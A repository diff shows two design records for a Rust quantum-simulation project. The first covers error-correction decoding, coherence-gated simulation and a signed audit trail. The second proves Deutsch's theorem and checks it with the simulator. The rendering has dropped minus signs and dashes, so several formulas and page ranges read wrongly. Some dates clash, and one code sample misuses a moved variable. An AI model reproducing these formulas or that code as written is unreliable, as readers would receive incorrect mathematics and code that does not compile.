merge_corrections(partial_corrections, boundary_correction)
}
/// Estimate optimal partition count based on detection density.
fn estimate_partition_count(graph: &WeightedGraph) -> usize {
let n = graph.num_nodes();
if n <= 20 { 1 }
else if n <= 50 { 2 }
else if n <= 100 { 4 }
else { (n / 25).min(rayon::current_num_threads()) }
}
```
This matches ruQu's existing boundary-to-boundary min-cut analysis: the partition
boundaries correspond to the cuts in the syndrome graph where independent decoding
regions meet.
### 6. Coherence Gating for Simulation FLOPs Reduction
The sheaf Laplacian coherence energy (from ADR-014) provides a measure of how
"healthy" a quantum state region is. High coherence energy means the region is
behaving as expected (low error rate). This enables a novel optimization:
```
Coherence Gating Decision Tree
================================
For each region R of the surface code:
1. Compute coherence energy E(R) via sheaf Laplacian
2. Compare to thresholds:
E(R) > E_high (0.95)
|
+-- Region is HEALTHY
| Action: SKIP detailed simulation for this region
| Use: simplified noise model (Pauli channel approximation)
| Savings: ~50% FLOPs for this region
|
E_low (0.70) < E(R) <= E_high (0.95)
|
+-- Region is NOMINAL
| Action: STANDARD simulation
| Use: full gate-by-gate simulation with noise
| Savings: none
|
E(R) <= E_low (0.70)
|
+-- Region is DEGRADED
| Action: ENHANCED simulation
| Use: full simulation + additional diagnostics
| Extra: log detailed error patterns, trigger early warning
| Savings: negative (more work, but necessary)
```
Implementation:
```rust
/// Coherence-gated simulation mode.
/// Uses coherence energy to decide simulation fidelity per region.
pub struct CoherenceGatedSimulator {
/// Full-fidelity simulator for nominal/degraded regions.
full_simulator: Box<dyn SimulationBackend>,
/// Simplified simulator for healthy regions.
simplified_simulator: SimplifiedNoiseModel,
/// Coherence engine for computing region health.
coherence_engine: CoherenceEngine,
/// Thresholds for gating decisions.
high_threshold: f64,
low_threshold: f64,
}
impl CoherenceGatedSimulator {
/// Simulate one QEC cycle with coherence gating.
pub fn simulate_cycle(
&mut self,
state: &mut StateVector,
code: &SurfaceCodeLayout,
error_model: &ErrorModel,
history: &SyndromeHistory,
) -> CycleResult {
// Step 1: Compute coherence energy per region
let regions = code.spatial_regions();
let coherence = self.coherence_engine.compute_regional(
history, &regions,
);
// Step 2: Classify regions and simulate accordingly
let mut cycle_syndromes = Vec::new();
let mut flops_saved = 0_u64;
let mut flops_total = 0_u64;
for (region, energy) in regions.iter().zip(coherence.energies()) {
let region_qubits = code.qubits_in_region(region);
if *energy > self.high_threshold {
// HEALTHY: Use simplified Pauli noise model
let syndrome = self.simplified_simulator.simulate_region(
state, &region_qubits, error_model,
);
let full_cost = estimate_full_sim_cost(&region_qubits);
let simplified_cost = estimate_simplified_cost(&region_qubits);
flops_saved += full_cost - simplified_cost;
flops_total += simplified_cost;
cycle_syndromes.push(syndrome);
} else if *energy > self.low_threshold {
// NOMINAL: Full simulation
let syndrome = self.full_simulator.simulate_region(
state, &region_qubits, error_model,
);
let cost = estimate_full_sim_cost(&region_qubits);
flops_total += cost;
cycle_syndromes.push(syndrome);
} else {
// DEGRADED: Full simulation + diagnostics
let syndrome = self.full_simulator.simulate_region_with_diagnostics(
state, &region_qubits, error_model,
);
let cost = estimate_full_sim_cost(&region_qubits) * 12 / 10;
flops_total += cost;
cycle_syndromes.push(syndrome);
// Trigger early warning system
tracing::warn!(
region = %region.id(),
coherence_energy = energy,
"Degraded coherence detected; enhanced monitoring active"
);
}
}
CycleResult {
syndromes: merge_region_syndromes(cycle_syndromes),
flops_saved,
flops_total,
coherence_energies: coherence,
}
}
}
```
### 7. Cryptographic Audit Trail
All syndrome decisions are signed and chained for tamper-evident logging, following
the existing ruQu pattern:
```rust
use ed25519_dalek::{SigningKey, Signature, Signer};
use blake3::Hasher;
/// Cryptographically auditable decision record.
#[derive(Debug, Serialize, Deserialize)]
pub struct AuditRecord {
/// Sequence number in the audit chain.
pub sequence: u64,
/// Blake3 hash of the previous record (chain linkage).
pub previous_hash: [u8; 32],
/// Timestamp (nanosecond precision).
pub timestamp_ns: u128,
/// The decision being recorded.
pub decision: AuditableDecision,
/// Ed25519 signature over (sequence || previous_hash || timestamp || decision).
pub signature: Signature,
}
#[derive(Debug, Serialize, Deserialize)]
pub enum AuditableDecision {
/// Raw syndrome from simulation.
SyndromeExtracted {
round: u64,
detections: Vec<Detection>,
simulation_id: Uuid,
},
/// Filtered syndrome after pipeline.
SyndromeFiltered {
round: u64,
detections_before: usize,
detections_after: usize,
filters_applied: Vec<String>,
},
/// Decoder correction decision.
CorrectionApplied {
round: u64,
corrections: Vec<(QubitId, Pauli)>,
confidence: f64,
decode_time_ns: u64,
},
/// Coherence gating decision.
CoherenceGating {
round: u64,
region_id: String,
coherence_energy: f64,
decision: GatingDecision,
flops_saved: u64,
},
/// Early warning alert.
EarlyWarning {
round: u64,
predicted_failure_round: u64,
confidence: f64,
affected_region: String,
},
/// Logical error detected.
LogicalError {
round: u64,
error_type: String,
decoder_confidence: f64,
},
}
#[derive(Debug, Serialize, Deserialize)]
pub enum GatingDecision {
SkipDetailedSimulation,
StandardSimulation,
EnhancedSimulation,
}
/// Audit trail manager.
pub struct AuditTrail {
signing_key: SigningKey,
chain_head: [u8; 32],
sequence: u64,
}
impl AuditTrail {
/// Record a decision in the audit trail.
pub fn record(&mut self, decision: AuditableDecision) -> AuditRecord {
let timestamp_ns = std::time::SystemTime::now()
.duration_since(std::time::UNIX_EPOCH)
.unwrap()
.as_nanos();
// Compute hash of the decision content
let mut hasher = Hasher::new();
hasher.update(&self.sequence.to_le_bytes());
hasher.update(&self.chain_head);
hasher.update(&timestamp_ns.to_le_bytes());
hasher.update(&bincode::serialize(&decision).unwrap());
let content_hash = hasher.finalize();
// Sign the hash
let signature = self.signing_key.sign(content_hash.as_bytes());
let record = AuditRecord {
sequence: self.sequence,
previous_hash: self.chain_head,
timestamp_ns,
decision,
signature,
};
// Update chain
self.chain_head = *content_hash.as_bytes();
self.sequence += 1;
record
}
}
```
### 8. Early Warning Feedback Loop
ruQu's early warning system predicts correlated failures 100+ cycles ahead. This
prediction feeds back into the simulation engine to validate decoder robustness:
```rust
/// Early warning integration with quantum simulation.
pub struct EarlyWarningIntegration {
warning_system: EarlyWarningSystem,
error_injector: ErrorInjector,
}
impl EarlyWarningIntegration {
/// Check early warning predictions and optionally inject
/// targeted errors to validate decoder response.
pub fn process_cycle(
&mut self,
history: &SyndromeHistory,
state: &mut StateVector,
code: &SurfaceCodeLayout,
) -> Vec<EarlyWarningAction> {
let predictions = self.warning_system.predict(history);
let mut actions = Vec::new();
for prediction in &predictions {
if prediction.confidence > 0.8 {
// High-confidence prediction: inject targeted errors
// to validate that the decoder handles this failure mode
let targeted_errors = self.error_injector.generate_targeted(
&prediction.affected_region,
&prediction.predicted_error_pattern,
code,
);
actions.push(EarlyWarningAction::InjectTargetedErrors {
region: prediction.affected_region.clone(),
errors: targeted_errors,
prediction_confidence: prediction.confidence,
predicted_failure_round: prediction.failure_round,
});
tracing::info!(
confidence = prediction.confidence,
failure_round = prediction.failure_round,
region = %prediction.affected_region,
"Early warning: injecting targeted errors for decoder validation"
);
} else if prediction.confidence > 0.5 {
// Moderate confidence: increase monitoring, do not inject
actions.push(EarlyWarningAction::IncreasedMonitoring {
region: prediction.affected_region.clone(),
enhanced_diagnostics: true,
});
}
}
actions
}
}
pub enum EarlyWarningAction {
/// Inject targeted errors to test decoder response.
InjectTargetedErrors {
region: String,
errors: Vec<InjectedError>,
prediction_confidence: f64,
predicted_failure_round: u64,
},
/// Increase monitoring without error injection.
IncreasedMonitoring {
region: String,
enhanced_diagnostics: bool,
},
}
```
### 9. Performance Targets
| Pipeline stage | Target latency | Distance-3 | Distance-5 | Distance-7 |
|---|---|---|---|---|
| Syndrome extraction (sim) | Varies | 2 ms | 15 ms | 80 ms |
| Syndrome filtering | <0.5 ms | 0.1 ms | 0.2 ms | 0.4 ms |
| MWPM decoding | <4 us | 1 us | 2 us | 3.5 us |
| Correction application | <0.1 ms | 0.01 ms | 0.05 ms | 0.08 ms |
| Coherence computation | <1 ms | 0.3 ms | 0.5 ms | 0.8 ms |
| Audit record creation | <0.05 ms | 0.02 ms | 0.03 ms | 0.04 ms |
| **Total cycle** | | **~3 ms** | **~16 ms** | **~82 ms** |
For distance-7 and above, the tensor network backend (ADR-QE-009) is used for
the syndrome extraction simulation, as 97 qubits exceeds state-vector capacity.
### 10. Integration Data Flow Summary
```
+-------------------+
| QuantumCircuit | Surface code syndrome extraction circuit
| (parameterized by | with noise model applied
| error model) |
+--------+----------+
|
v
+--------+----------+
| SimulationEngine | State vector (d<=5) or tensor network (d>=7)
| execute() |
+--------+----------+
|
| MeasurementOutcome (ancilla bitstring)
v
+--------+----------+
| SyndromeBridge | Convert measurements to detection events
| extract_syndrome()|
+--------+----------+
|
| SyndromeRound
v
+--------+----------+
| SyndromeFilter | Three-stage filtering (Structural|Shift|Evidence)
| Pipeline |
+--------+----------+
|
| FilteredSyndrome
v
+--------+----------+ +------------------+
| MWPM Decoder |<--->| ruvector-mincut | Parallel decoding
| (ruQu) | | graph partition | for large codes
+--------+----------+ +------------------+
|
| DecoderCorrection (Pauli operators)
v
+--------+----------+
| Correction Apply | Apply X/Z/Y Paulis to simulated state
+--------+----------+
|
| Corrected state
v
+--------+--+------+-----+---+
| | | |
v v v v
Coherence Early Warning Audit Trail
Engine System (Ed25519 +
(sheaf (100+ cycle Blake3)
Laplacian) prediction)
| |
| +---> Feeds back to simulation
| (targeted error injection)
|
+---> Coherence gating
(skip/standard/enhanced sim)
~50% FLOPs reduction when healthy
```
### 11. API Surface
The complete integration is exposed through a high-level API:
```rust
/// High-level QEC simulation with full pipeline integration.
pub struct QecSimulator {
engine: QuantumEngine,
bridge: SyndromeBridge,
filter: SyndromeFilterPipeline,
decoder: Box<dyn SyndromeDecoder>,
coherence: Option<CoherenceGatedSimulator>,
early_warning: Option<EarlyWarningIntegration>,
audit: AuditTrail,
history: SyndromeHistory,
}
impl QecSimulator {
/// Run N cycles of QEC simulation.
pub fn run_cycles(
&mut self,
code: &SurfaceCodeLayout,
error_model: &ErrorModel,
num_cycles: usize,
) -> QecSimulationResult {
let mut results = Vec::with_capacity(num_cycles);
for cycle in 0..num_cycles {
let cycle_result = self.run_single_cycle(code, error_model, cycle);
results.push(cycle_result);
}
QecSimulationResult {
cycles: results,
logical_error_rate: self.compute_logical_error_rate(&results),
total_flops_saved: results.iter().map(|r| r.flops_saved).sum(),
decoder_latency_p99: self.compute_decoder_p99(&results),
}
}
fn run_single_cycle(
&mut self,
code: &SurfaceCodeLayout,
error_model: &ErrorModel,
cycle: usize,
) -> CycleResult {
// ... full pipeline as described above
}
}
```
## Consequences
### Positive
1. **Unified pipeline**: Simulation, decoding, coherence analysis, and auditing
work together seamlessly rather than as disconnected tools.
2. **Real performance gains**: Coherence gating can reduce simulation FLOPs by
~50% for healthy regions, directly applicable to long QEC simulations.
3. **Decoder validation**: The simulation engine provides a controlled environment
to test decoder correctness under various error models.
4. **Early warning validation**: Predicted failures can be injected and the decoder's
response verified, increasing confidence in the early warning system.
5. **Auditable**: Every decision in the pipeline is cryptographically signed and
hash-chained, meeting compliance requirements for safety-critical applications.
6. **Leverages existing infrastructure**: `ruvector-mincut`, ruQu's decoder, and
the coherence engine are reused rather than reimplemented.
### Negative
1. **Coupling**: The integration creates dependencies between previously independent
crates. Changes to ruQu's syndrome format require updates to the bridge.
Mitigation: trait abstractions at integration boundaries.
2. **Complexity**: The full pipeline has many stages, each with its own configuration
and failure modes. Mitigation: sensible defaults and the high-level `QecSimulator`
API that hides complexity.
3. **Performance overhead**: Coherence computation and audit trail signing add
latency to each cycle. Mitigation: both are optional and can be disabled.
4. **Tensor network dependency**: Distance >= 7 codes require the tensor network
backend, which is behind a feature flag and may not always be compiled in.
### Risks and Mitigations
| Risk | Likelihood | Impact | Mitigation |
|---|---|---|---|
| Coherence gating skips a region that has real errors | Low | Missed errors | Conservative thresholds; periodic full-fidelity verification cycles |
| MWPM decoder exceeds 4us on partitioned syndrome | Medium | Latency violation | Adaptive partition count; fallback to non-partitioned decode |
| Early warning false positives cause unnecessary error injection | Medium | Wasted cycles | Confidence threshold (>0.8) gates injection; injection is rate-limited |
| Audit trail storage grows unboundedly | Medium | Disk exhaustion | Configurable retention; periodic pruning of old records |
| Syndrome format version mismatch between sim and decoder | Low | Decode failure | Version field in SyndromeRound; compatibility checks at pipeline init |
## References
- ruQu crate: boundary-to-boundary min-cut coherence gating
- ruQu SyndromeFilter: three-filter pipeline (Structural | Shift | Evidence)
- `ruvector-mincut` crate: graph partitioning for parallel decoding
- ADR-014: Coherence Engine (sheaf Laplacian coherence computation)
- ADR-CE-001: Sheaf Laplacian (mathematical foundation)
- ADR-QE-001: Core Engine Architecture (simulation backends)
- ADR-QE-009: Tensor Network Evaluation Mode (large code simulation)
- ADR-QE-010: Observability & Monitoring (metrics for pipeline stages)
- ADR-QE-011: Memory Gating & Power Management (resource constraints)
- Fowler et al., "Surface codes: Towards practical large-scale quantum computation" (2012)
- Higgott, "PyMatching: A Python package for decoding quantum codes with MWPM" (2022)
- Dennis et al., "Topological quantum memory" (2002) -- MWPM decoding
- Ed25519: https://ed25519.cr.yp.to/
- Blake3: https://github.com/BLAKE3-team/BLAKE3

View File

@@ -0,0 +1,483 @@
# ADR-QE-013: Deutsch's Theorem — Proof, Historical Comparison, and Verification
**Status**: Accepted
**Date**: 2026-02-06
**Authors**: ruv.io, RuVector Team
**Deciders**: Architecture Review Board
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 1.0 | 2026-02-06 | ruv.io | Complete proof, historical comparison, ruqu verification |
---
## Context
Deutsch's theorem (1985) is the founding result of quantum computation. It demonstrates
that a quantum computer can extract a *global property* of a function using fewer queries
than any classical algorithm — the first provable quantum speedup. Our ruqu engine
(ADR-QE-001 through ADR-QE-008) implements the full gate set and state-vector simulator
required to verify this theorem programmatically.
This ADR provides:
1. A **rigorous proof** of Deutsch's theorem
2. A **comparative analysis** of the five major formulations by different authors
3. A **de-quantization critique** examining when the advantage truly holds
4. **Verification** via the ruqu-core simulator
---
## 1. Statement of the Theorem
**Deutsch's Problem.** Given a black-box oracle computing f: {0,1} → {0,1}, determine
whether f is *constant* (f(0) = f(1)) or *balanced* (f(0) ≠ f(1)).
**Theorem (Deutsch, 1985; deterministic form: Cleve et al., 1998).**
A quantum computer can solve Deutsch's problem with certainty using exactly **one** oracle
query. Any classical deterministic algorithm requires **two** queries.
---
## 2. Classical Lower Bound
**Claim.** Every classical deterministic algorithm requires 2 queries.
**Proof.** A classical algorithm queries f on inputs from {0,1} sequentially. After a
single query — say f(0) = b — both cases remain consistent with the observation:
- Constant: f(1) = b
- Balanced: f(1) = 1 b
No deterministic strategy can distinguish these without a second query.
A probabilistic classical algorithm can guess with probability 1/2 after one query,
but cannot achieve certainty. ∎
---
## 3. Quantum Proof (Complete)
### 3.1 Oracle Definition
The quantum oracle U_f acts on two qubits as:
```
U_f |x⟩|y⟩ = |x⟩|y ⊕ f(x)⟩
```
where ⊕ is addition modulo 2. This is a unitary (and self-inverse) operation for all
four possible functions f.
### 3.2 Circuit
```
q0: |0⟩ ─── H ─── U_f ─── H ─── M ──→ result
q1: |1⟩ ─── H ──────────────────────
```
### 3.3 Step-by-Step Derivation
**Step 1. Initialization.**
```
|ψ₀⟩ = |0⟩|1⟩
```
**Step 2. Hadamard on both qubits.**
```
|ψ₁⟩ = H|0⟩ ⊗ H|1⟩
= (|0⟩ + |1⟩)/√2 ⊗ (|0⟩ |1⟩)/√2
```
**Step 3. Phase Kickback Lemma.**
> **Lemma.** Let |y⁻⟩ = (|0⟩ |1⟩)/√2. Then for any x ∈ {0,1}:
>
> U_f |x⟩|y⁻⟩ = (1)^{f(x)} |x⟩|y⁻⟩
*Proof of Lemma.*
```
U_f |x⟩|y⁻⟩ = U_f |x⟩ (|0⟩ |1⟩)/√2
= (|x⟩|f(x)⟩ |x⟩|1⊕f(x)⟩) / √2
```
Case f(x) = 0:
```
= |x⟩(|0⟩ |1⟩)/√2 = (+1)|x⟩|y⁻⟩
```
Case f(x) = 1:
```
= |x⟩(|1⟩ |0⟩)/√2 = (1)|x⟩|y⁻⟩
```
Therefore U_f |x⟩|y⁻⟩ = (1)^{f(x)} |x⟩|y⁻⟩. ∎
**Step 4. Apply oracle to the superposition.**
By linearity of U_f and the Phase Kickback Lemma:
```
|ψ₂⟩ = [ (1)^{f(0)} |0⟩ + (1)^{f(1)} |1⟩ ] / √2 ⊗ |y⁻⟩
```
Factor out the global phase (1)^{f(0)}:
```
|ψ₂⟩ = (1)^{f(0)} · [ |0⟩ + (1)^{f(0)⊕f(1)} |1⟩ ] / √2 ⊗ |y⁻⟩
```
**Step 5. Final Hadamard on first qubit.**
Using H|+⟩ = |0⟩ and H|−⟩ = |1⟩:
- If f(0) ⊕ f(1) = 0 (constant): first qubit is |+⟩, so H|+⟩ = |0⟩
- If f(0) ⊕ f(1) = 1 (balanced): first qubit is |−⟩, so H|−⟩ = |1⟩
Therefore:
```
|ψ₃⟩ = (1)^{f(0)} · |f(0) ⊕ f(1)⟩ ⊗ |y⁻⟩
```
**Step 6. Measurement.**
| Measurement of q0 | Conclusion |
|---|---|
| \|0⟩ (probability 1) | f is **constant** |
| \|1⟩ (probability 1) | f is **balanced** |
The global phase (1)^{f(0)} is physically unobservable. The measurement outcome is
**deterministic** — no probabilistic element remains. ∎
### 3.4 Why This Works
The quantum advantage arises from three principles acting together:
1. **Superposition**: The Hadamard gate creates a state that simultaneously probes
both inputs f(0) and f(1) in a single oracle call.
2. **Phase kickback**: The oracle encodes f(x) into relative phases rather than
bit values, moving information from the amplitude magnitudes into the complex
phases of the state vector.
3. **Interference**: The final Hadamard converts the relative phase between |0⟩
and |1⟩ into a computational basis state that can be measured. Constructive
interference amplifies the correct answer; destructive interference suppresses
the wrong one.
The algorithm extracts f(0) ⊕ f(1) — a *global* property — without ever learning
either f(0) or f(1) individually. This is impossible classically with one query.
---
## 4. Historical Comparison of Proofs
### 4.1 Timeline
| Year | Authors | Key Contribution |
|------|---------|------------------|
| 1985 | Deutsch | First quantum algorithm; probabilistic (50% success) |
| 1992 | Deutsch & Jozsa | Deterministic n-bit generalization; required 2 queries |
| 1998 | Cleve, Ekert, Macchiavello & Mosca | Deterministic + single query (modern form) |
| 2001 | Nielsen & Chuang | Canonical textbook presentation |
| 2006 | Calude | De-quantization of the single-bit case |
### 4.2 Deutsch's Original Proof (1985)
**Paper:** "Quantum Theory, the Church-Turing Principle and the Universal Quantum
Computer," *Proc. Royal Society London A* 400, pp. 97117.
Deutsch's original algorithm was **probabilistic**, succeeding with probability 1/2.
The circuit prepared the first qubit in an eigenstate basis and relied on interference
at the output, but lacked the phase-kickback construction that the modern proof uses.
The key insight was not the algorithm itself but the *philosophical claim*: Deutsch
reformulated the Church-Turing thesis as a physical principle, arguing that since
physics is quantum mechanical, the correct model of computation must be quantum.
He noted that classical physics uses real numbers that cannot be represented by
Turing machines, and proposed the quantum Turing machine as the proper universal
model.
Deutsch also connected his work to the Everett many-worlds interpretation, arguing
that quantum parallelism could be understood as computation occurring across
parallel universes simultaneously.
**Limitations:**
- Only solved the 1-bit case
- Probabilistic (50% success rate)
- The advantage over classical was present but not deterministic
### 4.3 Deutsch-Jozsa Extension (1992)
**Paper:** "Rapid Solution of Problems by Quantum Computation," *Proc. Royal Society
London A* 439, pp. 553558.
Deutsch and Jozsa generalized to n-bit functions f: {0,1}ⁿ → {0,1} where f is
promised to be either constant (same output on all inputs) or balanced (outputs 0
on exactly half the inputs and 1 on the other half).
**Key differences from 1985:**
- Deterministic algorithm (no probabilistic element)
- Required **two** oracle queries (not one)
- Demonstrated **exponential** speedup: quantum O(1) queries vs. classical
worst-case 2^(n1) + 1 queries for n-bit functions
**Proof technique:** Applied Hadamard to all n input qubits, queried the oracle once,
applied Hadamard again, and measured. If f is constant, the output is always |0⟩ⁿ.
If balanced, the output is never |0⟩ⁿ. However, the original 1992 formulation used
a slightly different circuit that needed a second query for the single-bit case.
### 4.4 Cleve-Ekert-Macchiavello-Mosca Improvement (1998)
**Paper:** "Quantum Algorithms Revisited," *Proc. Royal Society London A* 454,
pp. 339354. (arXiv: quant-ph/9708016)
This paper provided the **modern, textbook form** of the algorithm:
- Deterministic
- Single oracle query
- Works for all n, including n = 1
**Critical innovation:** The introduction of the ancilla qubit initialized to |1⟩ and
the explicit identification of the **phase kickback** mechanism. They recognized that
preparing the target qubit as H|1⟩ = |−⟩ converts the oracle's bit-flip action into
a phase change — a technique now fundamental to quantum algorithm design.
They also identified a unifying structure across quantum algorithms: "a Fourier
transform, followed by an f-controlled-U, followed by another Fourier transform."
This pattern later appeared in Shor's algorithm and the quantum phase estimation
framework.
### 4.5 Nielsen & Chuang Textbook Presentation (2000/2010)
**Book:** *Quantum Computation and Quantum Information*, Cambridge University Press.
(Section 1.4.3)
Nielsen and Chuang's presentation is the most widely taught version:
- Full density matrix formalism
- Explicit circuit diagram notation
- Rigorous bra-ket algebraic derivation
- Connects to quantum parallelism concept
- Treats it as a gateway to Deutsch-Jozsa (Section 1.4.4) and ultimately
to Shor and Grover
**Proof style:** Algebraic state-tracking through the circuit, step by step. Emphasis
on the tensor product structure and the role of entanglement (or rather, the lack
thereof — Deutsch's algorithm creates no entanglement between the query and
ancilla registers).
### 4.6 Comparison Matrix
| Aspect | Deutsch (1985) | Deutsch-Jozsa (1992) | Cleve et al. (1998) | Nielsen-Chuang (2000) |
|--------|----------------|----------------------|---------------------|-----------------------|
| **Input bits** | 1 | n | n | n |
| **Deterministic** | No (p = 1/2) | Yes | Yes | Yes |
| **Oracle queries** | 1 | 2 | 1 | 1 |
| **Ancilla init** | \|0⟩ | \|0⟩ | \|1⟩ (key insight) | \|1⟩ |
| **Phase kickback** | Implicit | Partial | Explicit | Explicit |
| **Proof technique** | Interference argument | Algebraic | Algebraic + structural | Full density matrix |
| **Fourier structure** | Not identified | Not identified | Identified | Inherited |
| **Entanglement needed** | Debated | Debated | No | No |
---
## 5. De-Quantization and the Limits of Quantum Advantage
### 5.1 Calude's De-Quantization (2006)
Cristian Calude showed that Deutsch's problem (single-bit case) can be solved
classically with one query if the black box is permitted to operate on
*higher-dimensional classical objects* ("complex bits" — classical analogues of
qubits).
**Mechanism:** Replace the Boolean black box f: {0,1} → {0,1} with a linear-algebraic
black box F: C² → C² that computes the same function on a 2-dimensional complex
vector space. A single application of F to a carefully chosen input vector produces
enough information to extract f(0) ⊕ f(1).
**Implication:** The quantum speedup in the 1-bit case may be an artifact of
comparing quantum registers (which carry 2-dimensional complex amplitudes) against
classical registers (which carry 1-bit Boolean values).
### 5.2 Abbott et al. — Entanglement and Scalability
Abbott and collaborators extended the de-quantization analysis:
- Any quantum algorithm with **bounded entanglement** can be de-quantized into an
equally efficient classical simulation.
- For the general n-bit Deutsch-Jozsa problem, the de-quantization does **not**
scale: classical simulation requires exponential resources when the quantum
algorithm maintains non-trivial entanglement.
- Key result: entanglement is not *essential* for quantum computation (some advantage
persists with separable states), but it is necessary for *exponential* speedup.
### 5.3 Classical Wave Analogies
Several groups demonstrated classical optical simulations of Deutsch-Jozsa:
| Group | Method | Insight |
|-------|--------|---------|
| Perez-Garcia et al. | Ring cavity + linear optics | Wave interference mimics quantum interference |
| Metamaterial groups | Electromagnetic waveguides | Constructive/destructive interference for constant/balanced |
| LCD programmable optics | Spatial light modulation | Classical coherence sufficient for small n |
These demonstrate that the *interference* ingredient is not uniquely quantum —
classical wave physics provides it too. What scales uniquely in quantum mechanics
is the exponential dimension of the Hilbert space (2ⁿ amplitudes from n qubits),
which classical wave systems cannot efficiently replicate.
### 5.4 Resolution
The modern consensus:
1. **For n = 1:** The quantum advantage is **real but modest** (1 query vs. 2), and
can be replicated classically by enlarging the state space (de-quantization).
2. **For general n:** The quantum advantage is **exponential and genuine**. The
Deutsch-Jozsa algorithm uses O(1) queries vs. classical Ω(2^(n1)). No known
de-quantization scales to this regime without exponential classical resources.
3. **The true quantum resource** is not superposition alone (classical waves have it)
nor interference alone, but the **exponential state space** of multi-qubit systems
combined with the ability to manipulate phases coherently across that space.
---
## 6. The Four Oracles
The function f: {0,1} → {0,1} has exactly four possible instantiations:
| Oracle | f(0) | f(1) | Type | Circuit Implementation |
|--------|------|------|------|-----------------------|
| f₀ | 0 | 0 | Constant | Identity (no gates) |
| f₁ | 1 | 1 | Constant | X on ancilla (q1) |
| f₂ | 0 | 1 | Balanced | CNOT(q0, q1) |
| f₃ | 1 | 0 | Balanced | X(q0), CNOT(q0, q1), X(q0) |
### Expected measurement outcomes
For all four oracles, measurement of qubit 0 yields:
| Oracle | f(0) ⊕ f(1) | Measurement q0 | Classification |
|--------|-------------|----------------|----------------|
| f₀ | 0 | \|0⟩ (prob = 1.0) | Constant |
| f₁ | 0 | \|0⟩ (prob = 1.0) | Constant |
| f₂ | 1 | \|1⟩ (prob = 1.0) | Balanced |
| f₃ | 1 | \|1⟩ (prob = 1.0) | Balanced |
---
## 7. Verification via ruqu-core
The ruqu-core simulator can verify all four cases of Deutsch's algorithm. The
verification test constructs each oracle circuit and confirms the deterministic
measurement outcome:
```rust
use ruqu_core::prelude::*;
use ruqu_core::gate::Gate;
fn deutsch_algorithm(oracle: &str) -> bool {
let mut state = QuantumState::new(2).unwrap();
// Prepare |01⟩
state.apply_gate(&Gate::X(1)).unwrap();
// Hadamard both qubits
state.apply_gate(&Gate::H(0)).unwrap();
state.apply_gate(&Gate::H(1)).unwrap();
// Apply oracle
match oracle {
"f0" => { /* identity — f(x) = 0 */ }
"f1" => { state.apply_gate(&Gate::X(1)).unwrap(); }
"f2" => { state.apply_gate(&Gate::CNOT(0, 1)).unwrap(); }
"f3" => {
state.apply_gate(&Gate::X(0)).unwrap();
state.apply_gate(&Gate::CNOT(0, 1)).unwrap();
state.apply_gate(&Gate::X(0)).unwrap();
}
_ => panic!("Unknown oracle"),
}
// Hadamard on query qubit
state.apply_gate(&Gate::H(0)).unwrap();
// Measure qubit 0: |0⟩ = constant, |1⟩ = balanced
let probs = state.probabilities();
// prob(q0 = 1) = sum of probs where bit 0 is set
let prob_q0_one = probs[1] + probs[3]; // indices with bit 0 = 1
prob_q0_one > 0.5 // true = balanced, false = constant
}
// Verification:
assert!(!deutsch_algorithm("f0")); // constant
assert!(!deutsch_algorithm("f1")); // constant
assert!( deutsch_algorithm("f2")); // balanced
assert!( deutsch_algorithm("f3")); // balanced
```
This confirms that a single oracle query, using the ruqu state-vector simulator,
correctly classifies all four functions with probability 1.
---
## 8. Architectural Significance for ruVector
### 8.1 Validation of Core Primitives
Deutsch's algorithm exercises exactly the minimal set of quantum operations:
| Primitive | Used in Deutsch's Algorithm | ruqu Module |
|-----------|---------------------------|-------------|
| Qubit initialization | \|0⟩, \|1⟩ states | `state.rs` |
| Hadamard gate | Superposition creation | `gate.rs` |
| CNOT gate | Entangling oracle | `gate.rs` |
| Pauli-X gate | Bit flip oracle | `gate.rs` |
| Measurement | Extracting classical result | `state.rs` |
| Phase kickback | Core quantum mechanism | implicit |
Passing the Deutsch verification confirms that the simulator's gate kernels,
state-vector representation, and measurement machinery are correct — it is a
"minimum viable quantum correctness test."
### 8.2 Foundation for Advanced Algorithms
The phase-kickback technique proven here is the same mechanism used in:
- **Grover's algorithm** (ADR-QE-006): Oracle marks states via phase flip
- **VQE** (ADR-QE-005): Parameter-shift rule uses phase differences
- **Quantum Phase Estimation**: Controlled-U operators produce phase kickback
- **Shor's algorithm**: Order-finding oracle uses modular exponentiation kickback
---
## 9. References
| # | Reference | Year |
|---|-----------|------|
| 1 | D. Deutsch, "Quantum Theory, the Church-Turing Principle and the Universal Quantum Computer," *Proc. R. Soc. Lond. A* 400, 97117 | 1985 |
| 2 | D. Deutsch & R. Jozsa, "Rapid Solution of Problems by Quantum Computation," *Proc. R. Soc. Lond. A* 439, 553558 | 1992 |
| 3 | R. Cleve, A. Ekert, C. Macchiavello & M. Mosca, "Quantum Algorithms Revisited," *Proc. R. Soc. Lond. A* 454, 339354 (arXiv: quant-ph/9708016) | 1998 |
| 4 | M.A. Nielsen & I.L. Chuang, *Quantum Computation and Quantum Information*, Cambridge University Press, 10th Anniversary Ed. | 2010 |
| 5 | C.S. Calude, "De-quantizing the Solution of Deutsch's Problem," *Int. J. Quantum Information* 5(3), 409415 | 2007 |
| 6 | A.A. Abbott, "The Deutsch-Jozsa Problem: De-quantisation and Entanglement," *Natural Computing* 11(1), 311 | 2012 |
| 7 | R.P. Feynman, "Simulating Physics with Computers," *Int. J. Theoretical Physics* 21, 467488 | 1982 |
| 8 | Perez-Garcia et al., "Quantum Computation with Classical Light," *Physics Letters A* 380(22), 19251931 | 2016 |
---
## Decision
**Accepted.** Deutsch's theorem is verified by the ruqu-core engine across all four
oracle cases. The proof and historical comparison are documented here as the
theoretical foundation underpinning all quantum algorithms implemented in the
ruqu-algorithms crate (Grover, VQE, QAOA, Surface Code).
The de-quantization analysis confirms that our simulator's true value emerges at
scale (n > 2 qubits), where classical de-quantization fails and the exponential
Hilbert space becomes a genuine computational resource.

Some files were not shown because too many files have changed in this diff Show More